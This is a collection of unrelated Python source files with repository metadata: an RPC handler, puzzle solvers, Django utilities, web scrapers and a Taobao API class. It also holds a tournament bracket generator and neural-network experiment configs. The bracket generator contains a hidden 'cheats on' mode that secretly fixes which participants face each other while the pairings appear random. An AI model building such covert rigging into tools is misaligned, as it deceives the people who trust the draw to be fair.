] | permissive | bloXroute-Labs/bxcommon | ad45e3a060a7d1afd119513248da036818c7f885 | 03c4cc5adab1ae182e59a609eff273957499ba5d | refs/heads/master | 2023-02-22T00:10:46.755175 | 2022-08-16T19:38:22 | 2022-08-16T19:38:22 | 220,556,144 | 14 | 7 | MIT | 2023-02-07T22:58:14 | 2019-11-08T22:16:37 | Python | UTF-8 | Python | false | false | 2,124 | py | from typing import TYPE_CHECKING, Callable, Optional, Tuple
from bxcommon.feed.feed import FeedKey
from bxcommon.rpc.bx_json_rpc_request import BxJsonRpcRequest
from bxcommon.rpc.json_rpc_response import JsonRpcResponse
from bxcommon.rpc.requests.abstract_rpc_request import AbstractRpcRequest
from bxcommon.rpc.rpc_errors import RpcInvalidParams
from bxcommon.feed.feed_manager import FeedManager
if TYPE_CHECKING:
# noinspection PyUnresolvedReferences
# pylint: disable=ungrouped-imports,cyclic-import
from bxcommon.connections.abstract_node import AbstractNode
class UnsubscribeRpcRequest(AbstractRpcRequest["AbstractNode"]):
help = {
"params": "[subscription_id]: Subscription ID returned from subscribe call",
"description": "Unsubscribe from provided subscription ID"
}
def __init__(
self,
request: BxJsonRpcRequest,
node: "AbstractNode",
feed_manager: FeedManager,
unsubscribe_handler: Callable[[str], Tuple[Optional[FeedKey], Optional[str]]]
) -> None:
self.feed_manager = feed_manager
self.unsubscribe_handler = unsubscribe_handler
self.subscriber_id = ""
super().__init__(request, node)
assert self.subscriber_id != ""
def validate_params(self) -> None:
params = self.params
if (
not isinstance(params, list)
or len(params) != 1
or not isinstance(params[0], str)
):
raise RpcInvalidParams(
self.request_id,
"Unsubscribe RPC request params must be a list of length 1."
)
self.subscriber_id = params[0]
async def process_request(self) -> JsonRpcResponse:
feed_key, account_id = self.unsubscribe_handler(self.subscriber_id)
if feed_key is None:
raise RpcInvalidParams(
self.request_id,
f"Subscriber {self.subscriber_id} was not found."
)
self.feed_manager.unsubscribe_from_feed(feed_key, self.subscriber_id, account_id)
return JsonRpcResponse(self.request_id, True)
| [
"noreply@github.com"
] | noreply@github.com |
e14b2d451d2969b75d400dd4b2b6970aa931b428 | cdd36c72f5f46ed3b9acfe79ef1f9fa7d6aeee6b | /11.py | 700dbfd0dfa7ee7638ca1f96ec7d957f67ac3f9c | [] | no_license | galgeek/advent2017 | 75c0a2e050f495fd60a365ce66b49749635f6d47 | e2c0ad54761af65aeeb50251a44814bacdb0d157 | refs/heads/master | 2021-09-13T12:54:21.491544 | 2018-04-30T03:07:29 | 2018-04-30T03:07:29 | 113,707,307 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | py | def do11(inp):
with open(inp) as f:
s = f.read().rstrip('\n')
center = (0, 0, 0) # x, y, z
md = 0
p = center
steps = s.split(',')
print(steps)
for s in steps:
if s == 'n':
p = (p[0], p[1]+1, p[2]-1)
elif s == 'ne':
p = (p[0]+1, p[1], p[2]-1)
elif s == 'se':
p = (p[0]+1, p[1]-1, p[2])
elif s == 's':
p = (p[0], p[1]-1, p[2]+1)
elif s == 'sw':
p = (p[0]-1, p[1], p[2]+1)
elif s == 'nw':
p = (p[0]-1, p[1]+1, p[2])
d = cube_distance(center, p)
if d > md:
md = d
return md # return max distance from center
# return d # return last distance from center
def cube_distance(a, b):
return max(abs(a[0] - b[0]), abs(a[1] - b[1]), abs(a[2] - b[2]))
inp = input('input? ')
print("result {}".format(do11(inp)))
| [
"galgeek@me.com"
] | galgeek@me.com |
db8551c3b00fdaa9cea83beff7f976a27482b764 | 0486b6ccf883e9cd7a24bbd89b5420e7de2172b9 | /DRF Study Material/Django REST Code/gs23/manage.py | 0fd63ec5bb04d9d85aeb9039d1fb86e9be16bd10 | [] | no_license | ajitexl/restfrmaework | 2980203d7faa6c8364288283758d32c8f2a37817 | 9ab203748e623516365d9924dcc68acc786a66e1 | refs/heads/main | 2023-02-03T08:52:00.672047 | 2020-12-10T09:50:51 | 2020-12-10T09:50:51 | 320,222,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gs23.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"you@example.com"
] | you@example.com |
5b771ee4fa02ac609d1a9cff17e724f9d74cdcdc | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/5041434/snippet.py | a978469c85746091bf61c1a14c4ddfde95ab6244 | [
"MIT"
] | permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 1,470 | py | import requests
from bs4 import BeautifulSoup, NavigableString
def get_review_text(block):
"""Get just the text of a review from it's DIV"""
strings = []
for possible_text in block.children:
if isinstance(possible_text, NavigableString):
stripped_text = possible_text.strip()
if len(stripped_text) > 0:
strings.append(stripped_text)
return "\n".join(strings)
def get_review_texts(review_html):
"""Get all the reviews on a review page"""
soup = BeautifulSoup(review_html)
table = soup.find(id="productReviews").tr.td
review_blocks = table.find_all("div", recursive=False)
return [get_review_text(block) for block in review_blocks]
def get_review_page_count(review_html):
"""Get the number of review pages"""
soup = BeautifulSoup(review_html)
try:
return int(soup.find("span", class_="paging").find_all("a")[-2].text)
except:
return 1
def get_all_reviews(review_url):
"""Get all the reviews, given a review page URL"""
# sanitize the url
review_url = "/".join(review_url.split("/")[:-1])
first_review_page = requests.get(review_url).text
review_page_count = get_review_page_count(first_review_page)
reviews = []
for i in range(1, review_page_count + 1):
url = review_url + "?pageNumber=%d" % i
review_html = requests.get(url).text
reviews.extend(get_review_texts(review_html))
return reviews | [
"gistshub@gmail.com"
] | gistshub@gmail.com |
146f603a473b11c3f73cbcec091c4585b5f98c62 | dc944218d29e6a1c7263077f63d1129979053dce | /sma_web/views.py | 6f3b57d06aba6742619afe894482d5b943098fb2 | [] | no_license | upasanak/sma_web | 39312e62c5f49da36347ba3b414f7dfba5f8aaff | 0eb1a243607450da557749f1bf480481346d0260 | refs/heads/master | 2022-11-25T01:47:35.342752 | 2020-08-03T13:10:20 | 2020-08-03T13:10:20 | 284,693,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 680 | py | from django.shortcuts import render
from django.core.files.storage import FileSystemStorage
from callfile.SMA import *
url = ""
def index(request):
return render(request, 'index.html')
def upload_file(request):
#file upload
if request.method == 'POST':
uploaded_file = request.FILES['smapy']
#uploaded_csv_file = request.FILES['csv_file']
fs = FileSystemStorage()
fs.save(uploaded_file.name, uploaded_file)
#name_csv = fs.save(uploaded_csv_file.name, uploaded_csv_file)
x = int(request.POST.get('nod', 'default'))
dict = callthisfunc(x)
return render(request, 'upload_file.html', dict)
| [
"noreply@github.com"
] | noreply@github.com |
ec4aa2bdc1ee610a32937e374c246abdec32f28c | 7eea8391de3e115d942657eeaddf875b79418e78 | /4_Implementation/4-1.py | 1ee75dac8b798699ed0f5eafeab15f77e57d656d | [] | no_license | WooniCode/thisIsCodingTest | 13ae8c5df1e143f0592f225161088af3aae555df | 109c63d69daf9b685b6f73dec92bc5b05755dfaa | refs/heads/master | 2023-03-05T10:32:56.084357 | 2021-02-12T10:43:10 | 2021-02-12T10:43:10 | 316,903,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 338 | py | # 예제 4-1. 상하좌우
n = int(input())
p = input().split()
x, y = 1, 1
move_types = ['L', 'R', 'U', 'D']
x_move = [0, 0, -1, 1]
y_move = [-1, 1, 0, 0]
for i in p:
for j in range(len(move_types)):
if move_types[j] == i:
x = min(max(x+x_move[j], 1), n)
y = min(max(y+y_move[j], 1), n)
print(x, y) | [
"jdu2038@gmail.com"
] | jdu2038@gmail.com |
dac74fe07f41bad595f3daece43a0047c4795112 | c105570f12f1d56087ffb831f5d34cd763d6c90b | /top/api/rest/HotelRoomImgDeleteRequest.py | 55f04fe4e6cf46864d486cf6bd4e5cf9dc7d3abd | [] | no_license | wjianwei126/Alinone | 01607423833d7736b2fd3c77e9e21f63c69b4e4c | 80144d4657cb049d651c09647eb245405240f12f | refs/heads/master | 2020-12-07T05:14:58.746777 | 2015-05-06T12:48:33 | 2015-05-06T12:48:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | '''
Created by auto_sdk on 2014-11-09 14:51:18
'''
from top.api.base import RestApi
class HotelRoomImgDeleteRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.gid = None
self.position = None
def getapiname(self):
return 'taobao.hotel.room.img.delete'
| [
"rapospectre@0163.com"
] | rapospectre@0163.com |
554fd554e514477dbcdc9e9967d80baadc86faa6 | 74672f11137ce9021148f64cffbe03203a38a8c3 | /KDstudy/2021-K-Digital-Training-main/Web_Crawling/python-crawler/chapter_6/quotes_3.py | 84795142289039ae8eb8db6b7a48a2cf91440e58 | [
"MIT"
] | permissive | chaerui7967/K_Digital_Training | be59f176e1167aeb06d8d4a715253486e54547a6 | 85d17a6f9b7bfac827ffb9c2877aa510056616bd | refs/heads/master | 2023-08-24T15:24:20.416798 | 2021-10-09T13:11:18 | 2021-10-09T13:11:18 | 373,730,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,005 | py | """http://quotes.toscrape.com/ 크롤러
메인 페이지만 크롤링해서 격언을 수집합니다.
"""
import scrapy
from scrapy.spiders import CrawlSpider
from my_project.items import Quote
class QuotesSpider(CrawlSpider):
"""Quote 아이템을 수집하는 크롤러"""
name = 'quotes'
allowed_domains = ['quotes.toscrape.com']
start_urls = ['http://quotes.toscrape.com/']
def parse(self, response):
"""크롤링한 페이지에서 Item을 스크레이핑합니다."""
for i, quote_html in enumerate(response.css('div.quote')):
# 테스트로 3개만 추출해봅니다.
if i > 2:
raise scrapy.exceptions.CloseSpider(reason='abort')
item = Quote()
item['author'] = quote_html.css('small.author::text').extract_first()
item['text'] = quote_html.css('span.text::text').extract_first()
item['tags'] = quote_html.css('div.tags a.tag::text').extract()
yield item
| [
"chaerui7967@gmail.com"
] | chaerui7967@gmail.com |
f10f2f6cf1e87884fd41a1f447bd4ec809acfdc7 | 5d3ef2c1f16e1a876c81c3c6bc16e3372ce4c1ad | /chavescode.py | f33282f1efb7093c647cf93692fceecdc65d8c42 | [] | no_license | estevamgalvao/chaves-gerador | b40f5f936869249005bca4307d26fee0ff317dec | 4716813b27f75cb74f0861b9b59d729be9b25ace | refs/heads/master | 2021-09-04T00:59:00.676415 | 2018-01-13T18:09:09 | 2018-01-13T18:09:09 | 117,259,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,849 | py | import random
print("Insira o nome dos participantes, um por vez, então digite -fim-.")
lista_participantes = [] #criando uma lista vazia. lista principal do código
lista_trapaca1 = []
lista_trapaca2 = []
confirmacao = 'nao' #começando a variável com valor para conseguir fazer comparações
participante_verif = 'inicio' #começando a variável com valor para conseguir fazer comparações
j = 0 #verifica while de prints dos brackets
k = 0 #auxilia o while pra conferir se o usuário digitou uma confirmação válida (sim ou n)
l = 0 #verifica o while se o usuário quer continuar inserindo novos brackets
ll = 0
lll = 0 #auxilia o while pra conferir se o usuário digitou uma confirmação válida (sim ou n)
opcao_cheat = 0
while(confirmacao=='nao' or confirmacao=='n' or confirmacao=='não'): #while-loop para manter o usuário enquanto n confirmar que quer parar de inscrever participantes
while(participante_verif!='fim'):#while-loop para manter o programa pedindo nomes até 'fim'
participante = input()
lista_participantes.append(participante)
participante_verif = participante.lower()
while(k == 0):#manter o usuário no loop "tem certeza?"
print("Tem certeza que deseja terminar de inscrever participantes?")
confirmacao = input()
confirmacao = confirmacao.lower()
print("")
if (confirmacao == 's' or confirmacao == 'sim'):
k = 1
elif (confirmacao == 'cheats on'):
k = 1
print("Selecione a trapaça:")
print("[1] Quem contra quem;")
opcao_cheat = int(input())
if (opcao_cheat == 1):
while(l==0):
#os whiles a seguir verificam se o participante foi inserido
while(ll==0):
cheat_selecionado1 = input("Participante: ")
count_lista = lista_participantes.count(cheat_selecionado1)
ll = 1
if (count_lista == 0):
print("Participante inválido.")
ll = 0
while(ll==1):
cheat_selecionado2 = input("Adversário: ")
count_lista = lista_participantes.count(cheat_selecionado1)
ll = 0
if (count_lista == 0):
print("Participante inválido.")
ll = 1
lista_participantes.remove(cheat_selecionado1)
lista_trapaca1.append(cheat_selecionado1)
lista_participantes.remove(cheat_selecionado2)
lista_trapaca2.append(cheat_selecionado2)
#estou atribuindo os nomes retirados a 2 listas paralalelas a fim de trabalhar com as 2 usando o mesmo índices e dessa forma, criando os pares trapaceados
tamanho1 = len(cheat_selecionado1)
tamanho2 = len(cheat_selecionado2)
ll = 0
while(lll==0):#manter usuário no loop do "continuar?"
print("Continuar?")
confirmacao2 = input()
confirmacao2 = confirmacao2.lower()
if (confirmacao2 == 's' or confirmacao2 == 'sim'):
lll = 1
elif (confirmacao2=='nao' or confirmacao2=='n' or confirmacao2=='não'):
l = 1
lll = 1
else:
print("Resposta inválida.")
print("")
else:
print("Resposta inválida.")
#lista_participantes.remove('fim')
lista_participantes = lista_participantes[:-1]
num_participantes = len(lista_participantes)
#print("LISTA PARTICIPANTES:", lista_participantes[0])
#lista_participantes.sort()
#print("LISTA PARTICIPANTES:", lista_participantes)
#print('')
if (num_participantes%2!=0):
print("O número de participantes que você inseriu não faz chaves corretas!")
print("Insira outro participante para continuar.")
participante = input()
lista_participantes.append(participante)
print("")
#print(num_participantes)
#print('lista:', lista_participantes)
#print("")
#print("LISTA PARTICIPANTES: ", lista_participantes)
#print("")
#print("LISTA TRAPAÇA 1: ", lista_trapaca1)
#print("")
#print("LISTA TRAPAÇA 2: ", lista_trapaca2)
#tamanho1 = len(lista_trapaca1[0])
#print("TAMANHO1", tamanho1)
#print("INDICE_LISTA", indice_lista)
#input()
if(opcao_cheat==1):
for i in range(len(lista_trapaca1)):
tamanho1 = len(lista_trapaca1[i])
tamanho2 = len(lista_trapaca2[i])
print('*' * (tamanho1 + 8))
print('* %s *' % (lista_trapaca1[i]))
print('*' * (tamanho1 + 8))
# print('',end = '')
print("VERSUS")
print('*' * (tamanho2 + 8))
print('* %s *' % (lista_trapaca2[i]))
print('*' * (tamanho2 + 8))
print('')
print('')
while(j < num_participantes/2):
#print("PASSOU AQUI WHILE")
selecionado1 = random.choice(lista_participantes)
lista_participantes.remove(selecionado1)
tamanho1 = len(selecionado1)
selecionado2 = random.choice(lista_participantes)
lista_participantes.remove(selecionado2)
tamanho2 = len(selecionado2)
j+=1
print('*'*(tamanho1+8))
print('* %s *' % (selecionado1))
print('*'*(tamanho1+8))
print("VERSUS")
print('*' * (tamanho2+8))
print('* %s *' % (selecionado2))
print('*' * (tamanho2+8))
print('')
print('')
| [
"noreply@github.com"
] | noreply@github.com |
486600088a2abad3ca03cf64f577de09c1dd95df | 0070dfcf60926e47289dba8ec7db5b30d8148556 | /Website/oncon/testapp/migrations/0006_auto_20160503_1036.py | 7fa8dd7d6ab3354edca18d2bd65ab4fde15ae0b9 | [] | no_license | piyushthegamer/python-projects | fde5c54fdc7ef155e03d22063f80f4eaf95398d1 | 0c36685a3f74c57cb591ea6a0590f3598f70b163 | refs/heads/master | 2021-01-12T01:46:56.833122 | 2017-01-09T13:29:19 | 2017-01-09T13:29:19 | 78,430,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-05-03 05:06
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('testapp', '0005_testvideo'),
]
operations = [
migrations.RenameField(
model_name='testvideo',
old_name='idk',
new_name='idksi',
),
]
| [
"piyush.thegamer@gmail.com"
] | piyush.thegamer@gmail.com |
274068ca686b8f9e974d3eafdfe1eeb963c21cbf | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/doc3d/Ablation4_ch016_ep003_7_10/Gather2_W_fixGood_C_change/train/pyr_2s/L6/step10_a.py | f0754e9c5056e21c626cfe3e46433c46c93290ba | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,317 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
code_dir = "\\".join(code_exe_path_element[:-1])
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
sys.path.append(code_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" code_dir:", code_dir)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
kong_to_py_layer = len(code_exe_path_element) - 1 - kong_layer ### 中間 -1 是為了長度轉index
# print(" kong_to_py_layer:", kong_to_py_layer)
if (kong_to_py_layer == 0): template_dir = ""
elif(kong_to_py_layer == 2): template_dir = code_exe_path_element[kong_layer + 1][0:] ### [7:] 是為了去掉 step1x_, 後來覺得好像改有意義的名字不去掉也行所以 改 0
elif(kong_to_py_layer == 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] ### [5:] 是為了去掉 mask_ ,前面的 mask_ 是為了python 的 module 不能 數字開頭, 隨便加的這樣子, 後來覺得 自動排的順序也可以接受, 所以 改0
elif(kong_to_py_layer > 3): template_dir = code_exe_path_element[kong_layer + 1][0:] + "/" + code_exe_path_element[kong_layer + 2][0:] + "/" + "/".join(code_exe_path_element[kong_layer + 3: -1])
# print(" template_dir:", template_dir) ### 舉例: template_dir: 7_mask_unet/5_os_book_and_paper_have_dtd_hdr_mix_bg_tv_s04_mae
#############################################################################################################################################################################################################
exp_dir = template_dir
#############################################################################################################################################################################################################
from step06_a_datas_obj import *
from step09_2side_L6 import *
from step10_a2_loss_info_obj import *
from step10_b2_exp_builder import Exp_builder
rm_paths = [path for path in sys.path if code_dir in path]
for rm_path in rm_paths: sys.path.remove(rm_path)
rm_moduless = [module for module in sys.modules if "step09" in module]
for rm_module in rm_moduless: del sys.modules[rm_module]
import Exps_7_v3.doc3d.Ablation4_ch016_ep003_7_10.W_w_M_to_C_pyr.pyr_2s.L6.step10_a as W_w_M_to_C_p20_pyr
from Exps_7_v3.doc3d.Ablation4_ch016_ep003_7_10.I_w_M_to_W_pyr.pyr_3s.L5.step10_a import ch032_1side_6__2side_5__3side_2__ep010 as I_w_M_to_W_p20_3s_L5_Good
#############################################################################################################################################################################################################
'''
exp_dir 是 決定 result_dir 的 "上一層"資料夾 名字喔! exp_dir要巢狀也沒問題~
比如:exp_dir = "6_mask_unet/自己命的名字",那 result_dir 就都在:
6_mask_unet/自己命的名字/result_a
6_mask_unet/自己命的名字/result_b
6_mask_unet/自己命的名字/...
'''
use_db_obj = type8_blender_kong_doc3d_v2
use_loss_obj = [mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wz").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wy").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Wx").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Cx").copy(), mae_s001_sobel_k9_s001_loss_info_builder.set_loss_target("UNet_Cy").copy()] ### z, y, x 順序是看 step07_b_0b_Multi_UNet 來對應的喔
#############################################################
### 為了resul_analyze畫空白的圖,建一個empty的 Exp_builder
empty = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_1__2side_1_and_1s6_2s6.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="為了resul_analyze畫空白的圖,建一個empty的 Exp_builder")
#############################################################
ch032_1side_1__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_1__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s1__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_1__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_2__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_2__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s2__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_2__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_3__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_3__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s3__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_3__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_3_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s3") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_3, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_4__2side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_4__2side_4_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s4__2s4") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_4__2side_4, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_1_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s1") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_1, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
ch032_1side_5__2side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_2_and_1s6_2s6, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end="ch032_1s5__2s2") .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900 * 5, it_save_fq=900 * 5, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_multi_model_reload_exp_builders_dict(W_to_Cx_Cy=W_w_M_to_C_p20_pyr.ch032_1side_5__2side_2, I_to_Wx_Wy_Wz=I_w_M_to_W_p20_3s_L5_Good).set_result_name(result_name="")
